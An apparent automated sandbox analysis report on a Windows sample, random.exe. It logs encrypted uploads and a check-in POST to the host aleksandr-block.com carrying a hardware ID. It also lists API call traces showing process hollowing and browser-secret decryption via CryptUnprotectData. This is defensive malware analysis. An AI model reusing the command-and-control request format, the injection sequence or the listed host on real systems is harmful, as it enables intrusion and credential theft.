                                                  2025-01-14 08:53:15 UTC15331OUTData Raw: 05 52 5f 53 08 dd 8b 46 72 76 6a c5 61 37 88 51 67 ce 8b 8e d0 de fd 6b 62 f6 de ad af 1e 45 00 64 45 af 2e 99 34 e5 88 49 a5 6e 34 a3 fb d2 2c 52 9d 88 a3 c8 82 ff d3 23 e4 bf dd fd a9 7f af ec d2 ff 05 21 e0 68 1a a4 35 11 62 5e 4b 00 d9 9e 9e 1c 4f 3f 50 ef ba e3 e0 ab 90 c0 66 3f 34 f9 01 ec 2a 16 2d 0d 6f 76 0a 2c de 05 64 4f 2b 30 3a ff d9 af 3f b2 15 b3 1e 06 d6 24 b9 c2 4a 8b 76 00 fe 32 f8 6e b8 d2 7b fd 61 55 e5 ef b9 cb 79 7a de ed e8 f3 02 d8 12 2b 35 46 b2 21 50 20 d0 3c 4e 0a 6a e7 68 4c 65 f4 c4 e7 30 5e 75 38 e9 a2 69 69 16 48 aa 79 b1 65 53 38 3d 58 03 17 54 93 3f c3 7a 7a 63 ac 3b 72 72 96 59 17 43 ae 36 36 27 39 48 ac 0d ea 2f 27 14 62 99 f5 26 0f aa 8d 18 a4 3b 34 eb 66 1f 95 2a e2 10 63 42 e0 c5 49 1b 67 c7 7d 38 9a 3f 1c 84 81 fb e7
                                                  Data Ascii: R_SFrvja7QgkbEdE.4In4,R#!h5b^KO?Pf?4*-ov,dO+0:?$Jv2n{aUyz+5F!P <NjhLe0^u8iiHyeS8=XT?zzc;rrYC66'9H/'b&;4f*cBIg}8?
                                                  2025-01-14 08:53:15 UTC15331OUTData Raw: a5 61 ed ee b7 4d 24 05 ce 96 de fc 38 52 8e c4 fa f8 f9 ed 87 84 1a 3a 8d b9 d7 70 10 b4 b1 95 54 dc e4 08 a1 21 2c b4 82 5f 05 eb c4 ec bd 24 da 63 fb 6d ec e1 14 54 25 ff 30 e1 45 7e f3 bb fa b9 eb 0b e1 b1 d7 fa 0e 04 b5 e1 f3 a2 c2 77 00 f5 50 7a 92 b0 ab 73 aa 8f d0 39 80 3c f2 2a e5 c1 64 14 39 da 0b 7a a7 90 00 08 03 90 df fe de bf 8d 07 a2 56 8f e2 a4 85 1b 32 76 35 d7 85 f1 f3 4b b1 7f 89 8b 29 60 45 0e d0 97 03 5b 85 aa 36 e1 52 cf 8f af 0d cb 19 71 ac 47 37 22 2a 5c 14 42 f9 c1 4f 0f 99 1b 2d a7 b1 b0 f7 1f cf a3 55 4e 29 0a 2d 75 91 fc c0 62 11 f8 e7 a6 35 5b de b5 f8 e1 97 5b 47 1f 1f e1 94 b3 de 2d 6b 92 65 c6 8f 0a 9a ee 99 78 3b c3 d0 04 b2 28 5a 49 1c 43 0e c0 f9 4a ec d3 d8 ab 97 ee 0d 67 28 81 9d 81 df 72 ac b5 40 41 e5 61 97 cf 21 31
                                                  Data Ascii: aM$8R:pT!,_$cmT%0E~wPzs9<*d9zV2v5K)`E[6RqG7"*\BO-UN)-ub5[[G-kex;(ZICJg(r@Aa!1
                                                  2025-01-14 08:53:15 UTC15331OUTData Raw: ba b0 e1 4f 95 fc 10 c1 2b 3a 85 cd 6a 82 9d a5 f3 fd 91 31 86 e7 91 fd bc 2e e9 0d 05 3e 9f b3 72 dc a5 c3 50 6d fd a6 09 2a 51 60 7e fe 96 f0 f4 57 40 8f ff 34 5f 7a 83 9d 0e 28 a5 10 9c e9 7d 04 b9 79 84 57 98 c3 b7 81 5e fd 5c 8b 85 63 fd b6 9c 78 ed 73 a5 7f b2 d1 81 22 30 5a 8d 14 2a 60 a4 15 57 9d f1 6d de 82 05 57 36 fc 4f 4b 43 4a 12 08 91 49 fc f6 cd 05 04 9f f8 69 91 ef c4 f1 9d 94 6a 40 50 bc ba f1 7c 40 16 fe 85 06 f6 d0 20 16 90 65 25 be 91 e8 62 10 dd e2 9c 40 1a 0e ec 41 29 fc 3e 44 f7 22 10 f6 7b 82 b2 1b 48 be e8 d4 40 c0 c7 ff c0 bb f6 5e f9 72 de 09 eb 8a e2 63 e6 25 7e 71 c4 be f5 95 58 55 11 f9 66 47 f1 3b 5c 58 3b b9 38 f5 04 dd c5 17 a1 be 6c be 77 cc f2 2d a4 b7 a8 64 35 98 da 50 03 51 86 12 c8 8e 95 88 bc ab 1f eb cd 9a 62 24 a7
                                                  Data Ascii: O+:j1.>rPm*Q`~W@4_z(}yW^\cxs"0Z*`WmW6OKCJIij@P|@ e%b@A)>D"{H@^rc%~qXUfG;\X;8lw-d5PQb$
                                                  2025-01-14 08:53:15 UTC15331OUTData Raw: 16 3f 1e 77 e3 47 2b 75 b5 fc 3c 9a 3a c0 f3 e5 d9 2e 57 84 67 2b e9 11 6b f6 5c 88 59 cb 3c b2 f4 ef e1 23 4b eb 2c aa e1 ab de fe 90 8f e1 ed c0 a9 95 5b e3 cd d1 bf 3a fa df d4 56 d6 18 60 dc 3d 12 b2 d2 2f 07 c4 81 97 e7 ff ad 08 d5 36 e4 f3 ba 2d ea 7f f6 a4 ac c5 d9 af 6e ef 7c 12 b9 55 d3 1e a8 90 94 61 65 ba 77 c9 89 e9 f0 25 a4 8e 09 3e b5 41 09 75 34 19 eb 2c 20 70 b9 37 aa 74 17 a9 e5 1b fa e5 ff bf 56 30 38 78 73 d5 e8 15 d0 16 4f 17 07 59 d2 68 25 7d 70 0c 5b dc 56 aa 21 f2 ed 3e 1c 71 74 de 20 82 bb d5 01 07 49 ae 9f 34 d2 96 01 f0 e4 fa 2f f5 7a 6f 21 8a 56 74 e9 b7 99 4c 97 f5 02 92 53 eb 78 64 09 76 7b 2a cf ed 35 da f5 a6 e9 5b d4 47 db b0 c8 64 e0 0e f8 dd 4e 13 ec a9 86 c5 1d a0 e8 7f 08 67 0b f4 fe 90 2c 0e 01 11 a5 69 24 f9 b5 77 b7
                                                  Data Ascii: ?wG+u<:.Wg+k\Y<#K,[:V`=/6-n|Uaew%>Au4, p7tV08xsOYh%}p[V!>qt I4/zo!VtLSxdv{*5[GdNg,i$w
                                                  2025-01-14 08:53:15 UTC15331OUTData Raw: 1b ff f8 9f 6c 14 78 cd ea da 5b ec 9c c9 f1 f1 3f 4b 53 ef 3c 2a 4d 1c 53 7f 5a 35 46 5e ab da 12 5f 10 1b f3 aa 80 01 8b d2 78 b6 5d bc 62 3a a9 2f bd df fc c9 07 85 31 ff 3c 0d 71 8b 77 bf 5a 27 c7 c3 a9 f1 83 94 ef 96 e7 9e 94 07 c9 8a 1f ab cb 08 22 9c 72 f0 aa fa 45 f2 d0 d8 99 59 88 0d 88 7f ff 13 f2 79 12 e6 20 6e 0e 46 01 4f 69 7a 5d 83 93 73 46 b5 a5 38 98 de c6 6b d9 13 1f 26 d8 1f 1b 4c 5c 94 fb 0d cd 1d 0d 29 cf 03 82 11 85 b5 1c fb 6f 84 d3 aa 46 58 b9 37 b7 5c 0a 6a 83 90 44 13 1b 3d d6 5f a8 bf 32 d1 65 11 34 85 f8 e5 69 bb e3 83 84 a9 5f f0 91 d2 3d ed a3 4f df 97 30 de 37 bd 96 de fa fb d3 60 16 99 cc b9 95 94 b8 4e 33 26 f0 a9 fa f1 7e 62 5b 5d 5b 01 22 26 27 ee 41 36 9d 9b 7d 87 a5 0e 6e 05 18 7a f4 f8 e4 dd 2d 3b a4 ab fb ae 0f ab e2
                                                  Data Ascii: lx[?KS<*MSZ5F^_x]b:/1<qwZ'"rEYy nFOiz]sF8k&L\)oFX7\jD=_2e4i_=O07`N3&~b[]["&'A6}nz-;
                                                  2025-01-14 08:53:15 UTC15331OUTData Raw: 9d 5f 9b d2 44 94 5e 3c 50 6d e6 be ba 6d 99 3c 09 cd 83 19 82 90 d2 25 cb f7 27 a1 f8 35 6b d8 94 e7 6f 3c dd e4 aa db 99 63 aa ef 92 90 9a f2 b4 3a 41 fe a7 65 fd 29 e9 8b a4 6b d5 1f aa 54 67 5c 47 6c 95 08 fc ba 7e 52 1a 94 9d 47 45 59 44 59 9a 59 3b 6b 7a aa 59 66 e8 e0 0e 8d ee b7 8c 65 6c 02 d9 01 58 79 a5 da 80 dd 2d 4f af 05 8b 82 e4 38 e9 28 8b d8 98 f0 da dd 11 ad e9 bd 91 50 e6 4a f0 ff bc 1e 22 fb df af 97 4c 6f f7 3f 10 07 59 38 cc ff e7 00 4d 91 e9 b6 58 f8 5e 6c be c2 e9 ce 6b d6 9f e3 37 c9 54 4d 50 ab a9 25 68 db 63 bb e4 54 a3 ed df 63 95 8c e8 df 87 38 52 b9 27 46 44 e9 43 ac 54 74 55 83 98 92 9c 37 81 f8 47 3c ac c9 56 ba 6b fb 8e 2e b9 ed 52 99 53 0f 62 1e 0e 7c fc 75 57 9b fe 50 9b 7d 07 0f f4 57 0f 63 bd e1 4c b3 59 ed 38 d0 69 59
                                                  Data Ascii: _D^<Pmm<%'5ko<c:Ae)kTg\Gl~RGEYDYY;kzYfelXy-O8(PJ"Lo?Y8MX^lk7TMP%hcTc8R'FDCTtU7G<Vk.RSb|uWP}WcLY8iY
                                                  2025-01-14 08:53:15 UTC15331OUTData Raw: 0d 36 cd e9 83 a1 62 9f 07 4e c2 2c d5 34 fc 84 23 60 da 76 a9 c1 1a 3b 2f ff 31 83 96 a4 09 32 e0 c2 d6 e4 cc 83 cc cc 20 ee bd 7f bd 9d 1a 2d 22 1d 18 e9 d8 f8 a7 1b a5 3e af 8e 2a 6c c4 34 3c a9 f2 39 21 3f f9 7e c5 6f 0b d5 bc 96 29 06 fd f5 a5 5a 55 7e a9 7c af f0 9b 2f d5 d8 ff 08 03 6f 0e 5a 94 96 e8 50 e0 f0 d3 f1 be 64 76 7a 94 79 97 ac d4 e5 ee 6a 2b 82 5e 93 31 18 25 62 26 0a 0f 9d ca 33 74 8f 7b 5f 77 96 d6 53 68 fa b1 16 0e 3a 4b db 2a be e9 5f de 8f c5 2c 1e 1c fc ab c2 4f 82 4a 1a 1e 52 a5 db c6 c4 ae 51 3e 1b ad d7 3b 18 b6 64 56 bd 47 65 fa c0 a7 70 08 75 71 7f 8a 9f 65 d0 dc f7 37 86 63 bd 8f 67 13 c9 0e 3c f9 85 f3 a7 5d bc 6a dc 6b 42 50 72 72 c0 2e 24 a3 11 75 e4 e6 92 85 62 93 34 ff 25 f1 0d 8d 34 23 07 de fe 89 be ed 01 a8 e9 55 c6
                                                  Data Ascii: 6bN,4#`v;/12 -">*l4<9!?~o)ZU~|/oZPdvzyj+^1%b&3t{_wSh:K*_,OJRQ>;dVGepuqe7cg<]jkBPrr.$ub4%4#U
                                                  2025-01-14 08:53:18 UTC1131INHTTP/1.1 200 OK
                                                  Date: Tue, 14 Jan 2025 08:53:18 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=ebb8f6isns2jitrb13rmgtvj6a; expires=Sat, 10 May 2025 02:39:55 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  X-Frame-Options: DENY
                                                  X-Content-Type-Options: nosniff
                                                  X-XSS-Protection: 1; mode=block
                                                  cf-cache-status: DYNAMIC
                                                  vary: accept-encoding
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qb0Dxwd20CY95D8xo0mmc2yqq4RO75pxnMR5pL3r6AwfNhwuHXY3JLtXB%2B9WuqCXds4mjOhA5wAELj8iakCBiQYFH11Qf3emgf25tdoPOhkOzOs7ptzMGFiQrmBqxcfdE%2FxvIrM1"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 901c650388d98ce3-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1960&rtt_var=745&sent=191&recv=568&lost=0&retrans=0&sent_bytes=2846&recv_bytes=553035&delivery_rate=1459270&cwnd=252&unsent_bytes=0&cid=11c5ed21241a2bf4&ts=3101&x=0"


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.549742188.114.97.3443528C:\Users\user\Desktop\random.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-14 08:53:18 UTC267OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 81
                                                  Host: aleksandr-block.com
                                                  2025-01-14 08:53:18 UTC81OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 39 31 37 39 38 33 35 31 39 35 39 30 31 42 38 44 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41
                                                  Data Ascii: act=get_message&ver=4.0&lid=FATE99--test&j=&hwid=9179835195901B8DB960CC18D99B375A
                                                  2025-01-14 08:53:19 UTC1129INHTTP/1.1 200 OK
                                                  Date: Tue, 14 Jan 2025 08:53:19 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=rc7lu07ui89ag9jva9r9bu7orf; expires=Sat, 10 May 2025 02:39:58 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  X-Frame-Options: DENY
                                                  X-Content-Type-Options: nosniff
                                                  X-XSS-Protection: 1; mode=block
                                                  cf-cache-status: DYNAMIC
                                                  vary: accept-encoding
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gwc6DzZUfBzhlVAoFMaP0SZV%2B2CTl4SgK6BtgK4AC%2B60iAVOersSZhNcXOp5ciM5rZEYWuTz00lwsYhKx9uyd3QU1721ptmCCD5j7dhoBqyBoIv5z8aLMukuGQB%2Fq%2BkCxS9Vgt%2Bc"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 901c651a3cd74264-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1875&min_rtt=1772&rtt_var=738&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=984&delivery_rate=1647855&cwnd=223&unsent_bytes=0&cid=950089c5ccde56fa&ts=478&x=0"
                                                  2025-01-14 08:53:19 UTC54INData Raw: 33 30 0d 0a 50 30 35 76 4b 70 6d 78 70 6b 4c 72 78 30 66 62 4f 56 6b 35 6c 42 65 62 67 45 4e 52 6b 56 4b 55 4c 72 62 54 4e 44 43 4a 6e 62 4e 6b 45 77 3d 3d 0d 0a
                                                  Data Ascii: 30P05vKpmxpkLrx0fbOVk5lBebgENRkVKULrbTNDCJnbNkEw==
                                                  2025-01-14 08:53:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:03:53:02
                                                  Start date:14/01/2025
                                                  Path:C:\Users\user\Desktop\random.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\random.exe"
                                                  Imagebase:0x3d0000
                                                  File size:340'480 bytes
                                                  MD5 hash:4283B9EBEDC388ABEAAFA9CEA78C1B70
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:03:53:02
                                                  Start date:14/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:03:53:02
                                                  Start date:14/01/2025
                                                  Path:C:\Users\user\Desktop\random.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\random.exe"
                                                  Imagebase:0x7e0000
                                                  File size:340'480 bytes
                                                  MD5 hash:4283B9EBEDC388ABEAAFA9CEA78C1B70
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:03:53:02
                                                  Start date:14/01/2025
                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 916
                                                  Imagebase:0xac0000
                                                  File size:483'680 bytes
                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:12.7%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:100%
                                                    Total number of Nodes:7
                                                    Total number of Limit Nodes:1

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,026E7DF7,026E7DE7), ref: 026E801D
                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 026E8030
                                                    • Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 026E804E
                                                    • ReadProcessMemory.KERNELBASE(0000037C,?,026E7E3B,00000004,00000000), ref: 026E8072
                                                    • VirtualAllocEx.KERNELBASE(0000037C,?,?,00003000,00000040), ref: 026E809D
                                                    • WriteProcessMemory.KERNELBASE(0000037C,00000000,?,?,00000000,?), ref: 026E80F5
                                                    • WriteProcessMemory.KERNELBASE(0000037C,00400000,?,?,00000000,?,00000028), ref: 026E8140
                                                    • WriteProcessMemory.KERNELBASE(0000037C,?,?,00000004,00000000), ref: 026E817E
                                                    • Wow64SetThreadContext.KERNEL32(00000098,04C20000), ref: 026E81BA
                                                    • ResumeThread.KERNELBASE(00000098), ref: 026E81C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2225298140.00000000026E7000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E7000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e7000_random.jbxd
                                                    Similarity
                                                    • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                    • String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                    • API String ID: 2687962208-232383841
                                                    • Opcode ID: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
                                                    • Instruction ID: 3a959dcaf8a0b544f743d12c6e7021d145f30d002469375c7a0a9a1270c89c60
                                                    • Opcode Fuzzy Hash: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
                                                    • Instruction Fuzzy Hash: 3BB1187664124AAFDB60CF68CC80BDAB3A5FF88714F158524EA0DAB341D770FA51CB94

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,026E7DF7,026E7DE7), ref: 026E801D
                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 026E8030
                                                    • Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 026E804E
                                                    • ReadProcessMemory.KERNELBASE(0000037C,?,026E7E3B,00000004,00000000), ref: 026E8072
                                                    • VirtualAllocEx.KERNELBASE(0000037C,?,?,00003000,00000040), ref: 026E809D
                                                    • WriteProcessMemory.KERNELBASE(0000037C,00000000,?,?,00000000,?), ref: 026E80F5
                                                    • WriteProcessMemory.KERNELBASE(0000037C,00400000,?,?,00000000,?,00000028), ref: 026E8140
                                                    • WriteProcessMemory.KERNELBASE(0000037C,?,?,00000004,00000000), ref: 026E817E
                                                    • Wow64SetThreadContext.KERNEL32(00000098,04C20000), ref: 026E81BA
                                                    • ResumeThread.KERNELBASE(00000098), ref: 026E81C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2225298140.00000000026E7000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E7000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e7000_random.jbxd
                                                    Similarity
                                                    • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                    • String ID: TerminateProcess
                                                    • API String ID: 2687962208-2873147277
                                                    • Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
                                                    • Instruction ID: dcb5d6a00351e402f3921332509fbf3fe2f78e08f01bb431d37c7d8ae711a539
                                                    • Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
                                                    • Instruction Fuzzy Hash: 87312D72240686ABDB74CF54CC91FEA7365BFC8B15F148508EB09AF281C6B4FA018B94

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 36 d61c3b-d62ae6 VirtualProtect 39 d62aed-d62b01 36->39 40 d62ae8 36->40 40->39
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(036E3588,?,?,?,?,?,?,?,00000000,?,00D627CC,?,00000040), ref: 00D62AD9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2225145813.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d60000_random.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 2f395c79c3861b630b350f88d16a875b54561ff20bb781e5f54ac333290643ea
                                                    • Instruction ID: 777f43f378938dfeaddcee0dc2108d76a0b244515b90316d9e4c46a58d2ac865
                                                    • Opcode Fuzzy Hash: 2f395c79c3861b630b350f88d16a875b54561ff20bb781e5f54ac333290643ea
                                                    • Instruction Fuzzy Hash: 4421E0B5D00619AFCB10DF9AD884ADEFBB4FB48310F50812AE918A7340C3B4A954CFE5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 41 d61c3c-d62ae6 VirtualProtect 44 d62aed-d62b01 41->44 45 d62ae8 41->45 45->44
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(036E3588,?,?,?,?,?,?,?,00000000,?,00D627CC,?,00000040), ref: 00D62AD9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2225145813.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d60000_random.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 74b92e41baea652d79dcbcc9b05fad53c24ab699c915587be24afa9440385f7d
                                                    • Instruction ID: b1ae88b28d9f0df7b5ea252ae3cee56a655b1bf33d4feda5919182202e481afd
                                                    • Opcode Fuzzy Hash: 74b92e41baea652d79dcbcc9b05fad53c24ab699c915587be24afa9440385f7d
                                                    • Instruction Fuzzy Hash: 0921C0B5D01659AFCB10DF9AD884ADEFBB4FB48310F10812AE918A7300D3B4A954CBE5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 46 d62a5f-d62ae6 VirtualProtect 48 d62aed-d62b01 46->48 49 d62ae8 46->49 49->48
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(036E3588,?,?,?,?,?,?,?,00000000,?,00D627CC,?,00000040), ref: 00D62AD9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2225145813.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d60000_random.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 3c1d3971c585225e68a4d466ac46ee8e4f830c9c01cc7853f53ccfeaaee94602
                                                    • Instruction ID: f1b99e8dc95a7057ff73fa46d23d93929a8d39224d685da9a8140d5715f8c2f7
                                                    • Opcode Fuzzy Hash: 3c1d3971c585225e68a4d466ac46ee8e4f830c9c01cc7853f53ccfeaaee94602
                                                    • Instruction Fuzzy Hash: B321E2B5D01619AFCB00DF9AD884ADEFFB4FB48310F10812AE918A7300C3B4A954CFA1

                                                    Execution Graph

                                                    Execution Coverage:8.6%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:65.4%
                                                    Total number of Nodes:373
                                                    Total number of Limit Nodes:29
                                                    execution_graph 14230 408740 14232 40874f 14230->14232 14231 408a02 ExitProcess 14232->14231 14233 408764 GetCurrentProcessId GetCurrentThreadId 14232->14233 14240 4089eb 14232->14240 14235 40878a 14233->14235 14236 40878e SHGetSpecialFolderPathW GetForegroundWindow 14233->14236 14235->14236 14237 408858 14236->14237 14242 43e840 14237->14242 14239 408969 14239->14240 14245 40b5d0 FreeLibrary 14239->14245 14248 440240 14240->14248 14251 441860 14242->14251 14244 43e84a RtlAllocateHeap 14244->14239 14246 40b5ec 14245->14246 14247 40b5f1 FreeLibrary 14246->14247 14247->14240 14253 441840 14248->14253 14250 440245 FreeLibrary 14250->14231 14252 441880 14251->14252 14252->14244 14252->14252 14254 441849 14253->14254 14254->14250 14255 41fd40 14256 41fda8 14255->14256 14257 41fd4e 14255->14257 14261 41fe70 14257->14261 14259 41fe2c 14259->14256 14260 41e250 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 14259->14260 14260->14256 14263 41fe80 14261->14263 14263->14263 14265 443390 14263->14265 14264 41ff6f 14266 4433b0 14265->14266 14267 44349e 14266->14267 14269 4402d0 LdrInitializeThunk 14266->14269 14267->14264 14269->14267 14270 40d082 14271 40d090 14270->14271 14274 43b7b0 14271->14274 14273 40d118 14273->14273 14275 43b7e0 14274->14275 14275->14275 14276 43bb0b CoCreateInstance 14275->14276 14277 43bb65 SysAllocString 14276->14277 14278 43c09e 14276->14278 14281 43bc06 14277->14281 14279 43c0ae GetVolumeInformationW 14278->14279 14288 43c0cc 14279->14288 14282 43bc0e CoSetProxyBlanket 14281->14282 14283 43c08d SysFreeString 14281->14283 14284 43c083 14282->14284 14285 43bc2e SysAllocString 14282->14285 14283->14278 14284->14283 14287 43bcf0 14285->14287 14287->14287 14289 43bd1c SysAllocString 14287->14289 14288->14273 14292 43bd41 14289->14292 14290 43c06d SysFreeString SysFreeString 14290->14284 14291 43c063 14291->14290 14292->14290 14292->14291 14293 43bd85 VariantInit 14292->14293 14295 43bdd0 14293->14295 14294 43c052 VariantClear 14294->14291 14295->14294 14296 440f47 14297 440e70 14296->14297 14298 440e7e 14296->14298 14297->14298 14303 4402d0 LdrInitializeThunk 14297->14303 14301 440ece 14298->14301 14302 4402d0 LdrInitializeThunk 14298->14302 14302->14301 14303->14298 14304 40cb44 CoInitializeSecurity CoInitializeSecurity 14305 443580 14306 443599 14305->14306 14307 4435bf 14305->14307 14306->14307 14311 4402d0 LdrInitializeThunk 14306->14311 14309 4435e8 14309->14307 14312 4402d0 LdrInitializeThunk 14309->14312 14311->14309 14312->14307 14313 418404 14314 4183d1 14313->14314 14317 4183e3 14313->14317 14316 4183e4 CryptUnprotectData 14314->14316 14315 4183eb CryptUnprotectData 14315->14313 14317->14314 14317->14315 14318 418416 14317->14318 14318->14314 14320 418418 14318->14320 14321 4184b7 14320->14321 14324 41aa90 14320->14324 14322 41aa90 4 API calls 14321->14322 14323 41853c 14322->14323 14325 41aac0 14324->14325 14336 413e50 14325->14336 14328 413e50 4 API calls 14329 41ac6d 14328->14329 14330 413e50 4 API calls 14329->14330 14331 41ad1a 14330->14331 14332 413e50 4 API calls 14331->14332 14333 41adc9 14332->14333 14334 413e50 4 API calls 14333->14334 14335 41ae40 14334->14335 14335->14320 14335->14335 14338 413e70 14336->14338 14369 443230 14338->14369 14339 443230 LdrInitializeThunk 14340 413f7f 14339->14340 14340->14339 14341 414186 14340->14341 14342 41423d 14340->14342 14343 4145fd 14340->14343 14359 41427e 14340->14359 14341->14328 14347 43e840 RtlAllocateHeap 14342->14347 14391 43e860 14343->14391 14345 414742 14345->14341 14350 443230 LdrInitializeThunk 14345->14350 14354 414764 14345->14354 14355 41468a 14345->14355 14356 414799 14345->14356 14358 4147c4 14345->14358 14364 414247 14347->14364 14350->14354 14418 43ec10 14354->14418 14355->14341 14355->14356 14355->14358 14422 4434f0 14355->14422 14356->14341 14356->14358 14426 443580 14356->14426 14357 41462e 14357->14341 14357->14345 14357->14354 14357->14355 14357->14356 14357->14358 14362 414724 14357->14362 